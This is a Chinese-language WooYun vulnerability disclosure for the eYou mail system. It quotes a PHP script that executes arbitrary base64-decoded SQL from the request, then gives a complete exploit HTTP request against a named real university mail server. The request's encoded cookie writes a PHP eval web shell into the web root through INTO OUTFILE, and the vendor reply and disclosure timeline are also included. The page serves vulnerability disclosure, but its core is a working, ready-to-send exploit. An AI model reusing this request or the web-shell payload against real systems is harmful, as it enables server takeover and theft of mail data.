乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-14: 细节已通知厂商并且等待厂商处理中 2014-08-14: 厂商已经确认,细节仅向厂商公开 2014-08-17: 细节向第三方安全合作伙伴开放 2014-10-08: 细节向核心白帽子及相关领域专家公开 2014-10-18: 细节向普通白帽子公开 2014-10-28: 细节向实习白帽子公开 2014-11-12: 细节向公众公开
亿邮邮件系统SQL导致批量GetShell
漏洞文件:\php\bill\print_addfeelog.php执行任意SQL命令,且不受GPC影响。默认MYSQL都是有权限导出文件权限的,可以导出一句话后门。
<p style="text-indent: 28px; "><?</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">include("include/config.inc");</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">include("include/mysql_wrap.php");</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">include("include/utils.php");</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">include("include/message.php");</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">include("common/check_admin.php");</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">$sql = base64_decode($_REQUEST['all_sql']);</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">$eyouSql = new eyousql();</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">$eyouSql->query($sql);</p><p style="text-indent: 28px; "> </p><p style="text-indent: 28px; ">?></p>
利用代码:
POST /php/bill/print_addfeelog.php HTTP/1.1Content-Length: 140Host: mail.sihs.edu.cnUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.2; zh-CN; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip,deflateAccept-Charset: GB2312,utf-8;q=0.7,*;q=0.7Keep-Alive: 115Connection: keep-aliveX-Forwarded-For: 127.0.0.1Cookie: cookie=1; all_sql=c2VsZWN0ICc8P3BocCBldmFsKCRfUE9TVFsxXSk/PmMnIGludG8gb3V0ZmlsZSAnL3Zhci9leW91L2FwYWNoZS9odGRvY3MvcGhwL2JpbGwvc2NyaXB0L2luZGV4LnBocCc7
请自行修复
危害等级:中
漏洞Rank:10
确认时间:2014-08-14 09:46
经比对,与http:///bugs/wooyun-2010-为同一漏洞。非首报,软件生产厂商已经知晓,对于所述老版本的问题,CNVD此前一直在监督软件生产厂商做好用户响应工作。
暂无